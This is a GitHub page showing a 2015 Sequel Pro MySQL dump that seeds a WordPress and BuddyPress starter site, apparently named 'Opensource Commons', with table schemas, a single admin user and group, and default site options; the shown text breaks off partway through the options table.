-
Notifications
You must be signed in to change notification settings - Fork 0
/
wordpress-commons-starter.sql
1587 lines (1395 loc) · 557 KB
/
wordpress-commons-starter.sql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
# ************************************************************
# Sequel Pro SQL dump
# Version 4096
#
# http://www.sequelpro.com/
# http://code.google.com/p/sequel-pro/
#
# Host: 127.0.0.1 (MySQL 5.6.22)
# Database: osc_rc2
# Generation Time: 2015-03-13 20:33:02 +0000
# ************************************************************
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
# Dump of table wp_bp_activity
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_activity`;
CREATE TABLE `wp_bp_activity` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`component` varchar(75) NOT NULL,
`type` varchar(75) NOT NULL,
`action` text NOT NULL,
`content` longtext NOT NULL,
`primary_link` text NOT NULL,
`item_id` bigint(20) NOT NULL,
`secondary_item_id` bigint(20) DEFAULT NULL,
`date_recorded` datetime NOT NULL,
`hide_sitewide` tinyint(1) DEFAULT '0',
`mptt_left` int(11) NOT NULL DEFAULT '0',
`mptt_right` int(11) NOT NULL DEFAULT '0',
`is_spam` tinyint(1) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`),
KEY `date_recorded` (`date_recorded`),
KEY `user_id` (`user_id`),
KEY `item_id` (`item_id`),
KEY `secondary_item_id` (`secondary_item_id`),
KEY `component` (`component`),
KEY `type` (`type`),
KEY `mptt_left` (`mptt_left`),
KEY `mptt_right` (`mptt_right`),
KEY `hide_sitewide` (`hide_sitewide`),
KEY `is_spam` (`is_spam`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_activity` WRITE;
/*!40000 ALTER TABLE `wp_bp_activity` DISABLE KEYS */;
INSERT INTO `wp_bp_activity` (`id`, `user_id`, `component`, `type`, `action`, `content`, `primary_link`, `item_id`, `secondary_item_id`, `date_recorded`, `hide_sitewide`, `mptt_left`, `mptt_right`, `is_spam`)
VALUES
(1,1,'members','last_activity','','','',0,NULL,'2015-02-16 23:02:23',0,0,0,0),
(2,1,'groups','created_group','<a href=\"http://opensource-commons.dev/people/osc-admin/\" title=\"osc-admin\">osc-admin</a> created the group <a href=\"http://opensource-commons.dev/groups/all-commons/\">All Commons</a>','','http://opensource-commons.dev/people/osc-admin/',1,0,'2015-02-16 21:45:52',0,0,0,0);
/*!40000 ALTER TABLE `wp_bp_activity` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_activity_meta
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_activity_meta`;
CREATE TABLE `wp_bp_activity_meta` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`activity_id` bigint(20) NOT NULL,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext,
PRIMARY KEY (`id`),
KEY `activity_id` (`activity_id`),
KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_bp_groups
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_groups`;
CREATE TABLE `wp_bp_groups` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`creator_id` bigint(20) NOT NULL,
`name` varchar(100) NOT NULL,
`slug` varchar(200) NOT NULL,
`description` longtext NOT NULL,
`status` varchar(10) NOT NULL DEFAULT 'public',
`enable_forum` tinyint(1) NOT NULL DEFAULT '1',
`date_created` datetime NOT NULL,
`auto_join` binary(1) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`),
KEY `creator_id` (`creator_id`),
KEY `status` (`status`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_groups` WRITE;
/*!40000 ALTER TABLE `wp_bp_groups` DISABLE KEYS */;
INSERT INTO `wp_bp_groups` (`id`, `creator_id`, `name`, `slug`, `description`, `status`, `enable_forum`, `date_created`, `auto_join`)
VALUES
(1,1,'All Commons','all-commons','Starter group for the whole Commons!','public',1,'2015-02-16 21:45:21',X'30');
/*!40000 ALTER TABLE `wp_bp_groups` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_groups_groupmeta
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_groups_groupmeta`;
CREATE TABLE `wp_bp_groups_groupmeta` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`group_id` bigint(20) NOT NULL,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext,
PRIMARY KEY (`id`),
KEY `group_id` (`group_id`),
KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_groups_groupmeta` WRITE;
/*!40000 ALTER TABLE `wp_bp_groups_groupmeta` DISABLE KEYS */;
INSERT INTO `wp_bp_groups_groupmeta` (`id`, `group_id`, `meta_key`, `meta_value`)
VALUES
(1,1,'total_member_count','1'),
(2,1,'last_activity','2015-02-16 21:45:21'),
(3,1,'invite_status','members'),
(4,1,'forum_id','a:1:{i:0;i:37;}'),
(5,1,'_bbp_forum_enabled_37','1');
/*!40000 ALTER TABLE `wp_bp_groups_groupmeta` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_groups_members
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_groups_members`;
CREATE TABLE `wp_bp_groups_members` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`group_id` bigint(20) NOT NULL,
`user_id` bigint(20) NOT NULL,
`inviter_id` bigint(20) NOT NULL,
`is_admin` tinyint(1) NOT NULL DEFAULT '0',
`is_mod` tinyint(1) NOT NULL DEFAULT '0',
`user_title` varchar(100) NOT NULL,
`date_modified` datetime NOT NULL,
`comments` longtext NOT NULL,
`is_confirmed` tinyint(1) NOT NULL DEFAULT '0',
`is_banned` tinyint(1) NOT NULL DEFAULT '0',
`invite_sent` tinyint(1) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`),
KEY `group_id` (`group_id`),
KEY `is_admin` (`is_admin`),
KEY `is_mod` (`is_mod`),
KEY `user_id` (`user_id`),
KEY `inviter_id` (`inviter_id`),
KEY `is_confirmed` (`is_confirmed`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_groups_members` WRITE;
/*!40000 ALTER TABLE `wp_bp_groups_members` DISABLE KEYS */;
INSERT INTO `wp_bp_groups_members` (`id`, `group_id`, `user_id`, `inviter_id`, `is_admin`, `is_mod`, `user_title`, `date_modified`, `comments`, `is_confirmed`, `is_banned`, `invite_sent`)
VALUES
(1,1,1,0,1,0,'Group Admin','2015-02-16 21:45:13','',1,0,0);
/*!40000 ALTER TABLE `wp_bp_groups_members` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_notifications
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_notifications`;
CREATE TABLE `wp_bp_notifications` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`item_id` bigint(20) NOT NULL,
`secondary_item_id` bigint(20) DEFAULT NULL,
`component_name` varchar(75) NOT NULL,
`component_action` varchar(75) NOT NULL,
`date_notified` datetime NOT NULL,
`is_new` tinyint(1) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`),
KEY `item_id` (`item_id`),
KEY `secondary_item_id` (`secondary_item_id`),
KEY `user_id` (`user_id`),
KEY `is_new` (`is_new`),
KEY `component_name` (`component_name`),
KEY `component_action` (`component_action`),
KEY `useritem` (`user_id`,`is_new`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_bp_user_blogs
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_user_blogs`;
CREATE TABLE `wp_bp_user_blogs` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`blog_id` bigint(20) NOT NULL,
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`),
KEY `blog_id` (`blog_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_user_blogs` WRITE;
/*!40000 ALTER TABLE `wp_bp_user_blogs` DISABLE KEYS */;
INSERT INTO `wp_bp_user_blogs` (`id`, `user_id`, `blog_id`)
VALUES
(1,1,1);
/*!40000 ALTER TABLE `wp_bp_user_blogs` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_user_blogs_blogmeta
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_user_blogs_blogmeta`;
CREATE TABLE `wp_bp_user_blogs_blogmeta` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`blog_id` bigint(20) NOT NULL,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext,
PRIMARY KEY (`id`),
KEY `blog_id` (`blog_id`),
KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_user_blogs_blogmeta` WRITE;
/*!40000 ALTER TABLE `wp_bp_user_blogs_blogmeta` DISABLE KEYS */;
INSERT INTO `wp_bp_user_blogs_blogmeta` (`id`, `blog_id`, `meta_key`, `meta_value`)
VALUES
(1,1,'url','http://opensource-commons.dev'),
(2,1,'name','Opensource Commons'),
(3,1,'description','Just another WordPress site'),
(4,1,'last_activity','2015-02-16 22:46:35'),
(5,1,'close_comments_for_old_posts','0'),
(6,1,'close_comments_days_old','14'),
(7,1,'thread_comments_depth','5');
/*!40000 ALTER TABLE `wp_bp_user_blogs_blogmeta` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_xprofile_data
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_xprofile_data`;
CREATE TABLE `wp_bp_xprofile_data` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`field_id` bigint(20) unsigned NOT NULL,
`user_id` bigint(20) unsigned NOT NULL,
`value` longtext NOT NULL,
`last_updated` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `field_id` (`field_id`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_xprofile_data` WRITE;
/*!40000 ALTER TABLE `wp_bp_xprofile_data` DISABLE KEYS */;
INSERT INTO `wp_bp_xprofile_data` (`id`, `field_id`, `user_id`, `value`, `last_updated`)
VALUES
(1,1,1,'osc-admin','2015-02-16 22:46:35');
/*!40000 ALTER TABLE `wp_bp_xprofile_data` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_xprofile_fields
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_xprofile_fields`;
CREATE TABLE `wp_bp_xprofile_fields` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`group_id` bigint(20) unsigned NOT NULL,
`parent_id` bigint(20) unsigned NOT NULL,
`type` varchar(150) NOT NULL,
`name` varchar(150) NOT NULL,
`description` longtext NOT NULL,
`is_required` tinyint(1) NOT NULL DEFAULT '0',
`is_default_option` tinyint(1) NOT NULL DEFAULT '0',
`field_order` bigint(20) NOT NULL DEFAULT '0',
`option_order` bigint(20) NOT NULL DEFAULT '0',
`order_by` varchar(15) NOT NULL DEFAULT '',
`can_delete` tinyint(1) NOT NULL DEFAULT '1',
PRIMARY KEY (`id`),
KEY `group_id` (`group_id`),
KEY `parent_id` (`parent_id`),
KEY `field_order` (`field_order`),
KEY `can_delete` (`can_delete`),
KEY `is_required` (`is_required`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_xprofile_fields` WRITE;
/*!40000 ALTER TABLE `wp_bp_xprofile_fields` DISABLE KEYS */;
INSERT INTO `wp_bp_xprofile_fields` (`id`, `group_id`, `parent_id`, `type`, `name`, `description`, `is_required`, `is_default_option`, `field_order`, `option_order`, `order_by`, `can_delete`)
VALUES
(1,1,0,'textbox','Name','',1,0,0,0,'',0);
/*!40000 ALTER TABLE `wp_bp_xprofile_fields` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_xprofile_groups
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_xprofile_groups`;
CREATE TABLE `wp_bp_xprofile_groups` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(150) NOT NULL,
`description` mediumtext NOT NULL,
`group_order` bigint(20) NOT NULL DEFAULT '0',
`can_delete` tinyint(1) NOT NULL,
PRIMARY KEY (`id`),
KEY `can_delete` (`can_delete`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_bp_xprofile_groups` WRITE;
/*!40000 ALTER TABLE `wp_bp_xprofile_groups` DISABLE KEYS */;
INSERT INTO `wp_bp_xprofile_groups` (`id`, `name`, `description`, `group_order`, `can_delete`)
VALUES
(1,'Base','',0,0);
/*!40000 ALTER TABLE `wp_bp_xprofile_groups` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_bp_xprofile_meta
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_bp_xprofile_meta`;
CREATE TABLE `wp_bp_xprofile_meta` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`object_id` bigint(20) NOT NULL,
`object_type` varchar(150) NOT NULL,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext,
PRIMARY KEY (`id`),
KEY `object_id` (`object_id`),
KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_commentmeta
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_commentmeta`;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_comments
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_comments`;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT '0',
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT '',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
`user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`)
VALUES
(1,1,'Mr WordPress','','https://wordpress.org/','','2015-02-16 21:07:26','2015-02-16 21:07:26','Hi, this is a comment.\nTo delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.',0,'1','','',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
# Dump of table wp_em_bookings
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_em_bookings`;
CREATE TABLE `wp_em_bookings` (
`booking_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`event_id` bigint(20) unsigned NOT NULL,
`person_id` bigint(20) unsigned NOT NULL,
`booking_spaces` int(5) NOT NULL,
`booking_comment` text,
`booking_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
`booking_status` tinyint(1) NOT NULL DEFAULT '1',
`booking_price` decimal(14,4) unsigned NOT NULL DEFAULT '0.0000',
`booking_tax_rate` decimal(7,4) DEFAULT NULL,
`booking_taxes` decimal(14,4) DEFAULT NULL,
`booking_meta` longtext,
PRIMARY KEY (`booking_id`),
KEY `event_id` (`event_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_em_events
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_em_events`;
CREATE TABLE `wp_em_events` (
`event_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) unsigned NOT NULL,
`event_slug` varchar(200) DEFAULT NULL,
`event_owner` bigint(20) unsigned DEFAULT NULL,
`event_status` int(1) DEFAULT NULL,
`event_name` text,
`event_start_time` time DEFAULT NULL,
`event_end_time` time DEFAULT NULL,
`event_all_day` int(1) DEFAULT NULL,
`event_start_date` date DEFAULT NULL,
`event_end_date` date DEFAULT NULL,
`post_content` longtext,
`event_rsvp` tinyint(1) NOT NULL DEFAULT '0',
`event_rsvp_date` date DEFAULT NULL,
`event_rsvp_time` time DEFAULT NULL,
`event_rsvp_spaces` int(5) DEFAULT NULL,
`event_spaces` int(5) DEFAULT '0',
`event_private` tinyint(1) NOT NULL DEFAULT '0',
`location_id` bigint(20) unsigned DEFAULT NULL,
`recurrence_id` bigint(20) unsigned DEFAULT NULL,
`event_category_id` bigint(20) unsigned DEFAULT NULL,
`event_attributes` text,
`event_date_created` datetime DEFAULT NULL,
`event_date_modified` datetime DEFAULT NULL,
`recurrence` tinyint(1) NOT NULL DEFAULT '0',
`recurrence_interval` int(4) DEFAULT NULL,
`recurrence_freq` tinytext,
`recurrence_byday` tinytext,
`recurrence_byweekno` int(4) DEFAULT NULL,
`recurrence_days` int(4) DEFAULT NULL,
`recurrence_rsvp_days` int(3) DEFAULT NULL,
`blog_id` bigint(20) unsigned DEFAULT NULL,
`group_id` bigint(20) unsigned DEFAULT NULL,
PRIMARY KEY (`event_id`),
KEY `event_status` (`event_status`),
KEY `post_id` (`post_id`),
KEY `blog_id` (`blog_id`),
KEY `group_id` (`group_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_em_locations
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_em_locations`;
CREATE TABLE `wp_em_locations` (
`location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) unsigned NOT NULL,
`blog_id` bigint(20) unsigned DEFAULT NULL,
`location_slug` varchar(200) DEFAULT NULL,
`location_name` text,
`location_owner` bigint(20) unsigned NOT NULL DEFAULT '0',
`location_address` varchar(200) DEFAULT NULL,
`location_town` varchar(200) DEFAULT NULL,
`location_state` varchar(200) DEFAULT NULL,
`location_postcode` varchar(10) DEFAULT NULL,
`location_region` varchar(200) DEFAULT NULL,
`location_country` char(2) DEFAULT NULL,
`location_latitude` float(10,6) DEFAULT NULL,
`location_longitude` float(10,6) DEFAULT NULL,
`post_content` longtext,
`location_status` int(1) DEFAULT NULL,
`location_private` tinyint(1) NOT NULL DEFAULT '0',
PRIMARY KEY (`location_id`),
KEY `location_state` (`location_state`),
KEY `location_region` (`location_region`),
KEY `location_country` (`location_country`),
KEY `post_id` (`post_id`),
KEY `blog_id` (`blog_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_em_meta
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_em_meta`;
CREATE TABLE `wp_em_meta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`object_id` bigint(20) unsigned NOT NULL,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext,
`meta_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (`meta_id`),
KEY `object_id` (`object_id`),
KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_em_tickets
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_em_tickets`;
CREATE TABLE `wp_em_tickets` (
`ticket_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`event_id` bigint(20) unsigned NOT NULL,
`ticket_name` tinytext NOT NULL,
`ticket_description` text,
`ticket_price` decimal(14,4) DEFAULT NULL,
`ticket_start` datetime DEFAULT NULL,
`ticket_end` datetime DEFAULT NULL,
`ticket_min` int(10) DEFAULT NULL,
`ticket_max` int(10) DEFAULT NULL,
`ticket_spaces` int(11) DEFAULT NULL,
`ticket_members` int(1) DEFAULT NULL,
`ticket_members_roles` longtext,
`ticket_guests` int(1) DEFAULT NULL,
`ticket_required` int(1) DEFAULT NULL,
`ticket_meta` longtext,
PRIMARY KEY (`ticket_id`),
KEY `event_id` (`event_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_em_tickets_bookings
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_em_tickets_bookings`;
CREATE TABLE `wp_em_tickets_bookings` (
`ticket_booking_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`booking_id` bigint(20) unsigned NOT NULL,
`ticket_id` bigint(20) unsigned NOT NULL,
`ticket_booking_spaces` int(6) NOT NULL,
`ticket_booking_price` decimal(14,4) NOT NULL,
PRIMARY KEY (`ticket_booking_id`),
KEY `booking_id` (`booking_id`),
KEY `ticket_id` (`ticket_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_links
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_links`;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
`link_rating` int(11) NOT NULL DEFAULT '0',
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table wp_options
# ------------------------------------------------------------
DROP TABLE IF EXISTS `wp_options`;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(64) NOT NULL DEFAULT '',
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`)
VALUES
(1,'siteurl','http://opensource-commons.dev','yes'),
(2,'home','http://opensource-commons.dev','yes'),
(3,'blogname','Opensource Commons','yes'),
(4,'blogdescription','Just another WordPress site','yes'),
(5,'users_can_register','0','yes'),
(6,'admin_email','[email protected]','yes'),
(7,'start_of_week','1','yes'),
(8,'use_balanceTags','0','yes'),
(9,'use_smilies','1','yes'),
(10,'require_name_email','1','yes'),
(11,'comments_notify','1','yes'),
(12,'posts_per_rss','10','yes'),
(13,'rss_use_excerpt','0','yes'),
(14,'mailserver_url','mail.example.com','yes'),
(15,'mailserver_login','[email protected]','yes'),
(16,'mailserver_pass','password','yes'),
(17,'mailserver_port','110','yes'),
(18,'default_category','1','yes'),
(19,'default_comment_status','open','yes'),
(20,'default_ping_status','open','yes'),
(21,'default_pingback_flag','0','yes'),
(22,'posts_per_page','10','yes'),
(23,'date_format','F j, Y','yes'),
(24,'time_format','g:i a','yes'),
(25,'links_updated_date_format','F j, Y g:i a','yes'),
(26,'comment_moderation','0','yes'),
(27,'moderation_notify','1','yes'),
(28,'permalink_structure','/%postname%/','yes'),
(29,'gzipcompression','0','yes'),
(30,'hack_file','0','yes'),
(31,'blog_charset','UTF-8','yes'),
(32,'moderation_keys','','no'),
